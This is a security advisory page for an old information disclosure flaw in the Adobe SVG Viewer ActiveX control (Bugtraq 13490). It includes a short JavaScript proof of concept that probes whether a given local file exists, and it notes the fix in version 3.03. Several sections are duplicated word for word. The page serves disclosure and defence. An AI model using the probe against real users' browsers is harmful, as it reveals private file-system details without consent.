Adobe SVG Viewer ActiveX Control SRC Information Disclosure Vulnerability
BID:13490
Info
Adobe SVG Viewer ActiveX Control SRC Information Disclosure Vulnerability
| Bugtraq ID: | 13490 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 04 2005 12:00AM |
| Updated: | May 04 2005 12:00AM |
| Credit: | Discovered by Robert Fly <[email protected]>. |
| Vulnerable: |
Adobe SVG Viewer 3.0 2 Adobe SVG Viewer 3.0 1 Adobe SVG Viewer 3.0 |
| Not Vulnerable: |
Adobe SVG Viewer 3.0 3 |
Discussion
Adobe SVG Viewer ActiveX Control SRC Information Disclosure Vulnerability
The Adobe SVG Viewer ActiveX control is prone to an information disclosure vulnerability. Reports indicate that the Adobe SVG Viewer ActiveX control may be employed to disclose the existence of a target file.
Information that is harvested by leveraging this vulnerability may be used to aid in further attacks.
This vulnerability affects Adobe SVG Viewer version 3.02 and earlier.
The Adobe SVG Viewer ActiveX control is prone to an information disclosure vulnerability. Reports indicate that the Adobe SVG Viewer ActiveX control may be employed to disclose the existence of a target file.
Information that is harvested by leveraging this vulnerability may be used to aid in further attacks.
This vulnerability affects Adobe SVG Viewer version 3.02 and earlier.
Exploit / POC
Adobe SVG Viewer ActiveX Control SRC Information Disclosure Vulnerability
The following proof of concept is available:
Sample Javascript:
function load(filename)
{
//foo is reference to SVG ActiveX control, filename is the filename
you're looking for
foo.src = filename;
setTimeout("loading()", 5000);
}
function loading()
{
if (document.readyState != 'complete')
{
alert('File does not exist.');
}
else
{
alert('File exists.');
}
window.location.reload(false);
}
The following proof of concept is available:
Sample Javascript:
function load(filename)
{
//foo is reference to SVG ActiveX control, filename is the filename
you're looking for
foo.src = filename;
setTimeout("loading()", 5000);
}
function loading()
{
if (document.readyState != 'complete')
{
alert('File does not exist.');
}
else
{
alert('File exists.');
}
window.location.reload(false);
}
Solution / Fix
Adobe SVG Viewer ActiveX Control SRC Information Disclosure Vulnerability
Solution:
This issue has been addressed in Adobe SVG Viewer 3.03.
Adobe SVG Viewer 3.0 1
Adobe SVG Viewer 3.0 2
Adobe SVG Viewer 3.0
Solution:
This issue has been addressed in Adobe SVG Viewer 3.03.
Adobe SVG Viewer 3.0 1
-
Adobe SVG Viewer 3.03
http://www.adobe.com/svg/viewer/install/mainframed.html
Adobe SVG Viewer 3.0 2
-
Adobe SVG Viewer 3.03
http://www.adobe.com/svg/viewer/install/mainframed.html
Adobe SVG Viewer 3.0
-
Adobe SVG Viewer 3.03
http://www.adobe.com/svg/viewer/install/mainframed.html
References
Adobe SVG Viewer ActiveX Control SRC Information Disclosure Vulnerability
References:
References:
- Adobe Homepage (Adobe)
- SVG Zone (Adobe)
- Local file detection bug found through Adobe SVG Viewer ("Hyperdose Security"
)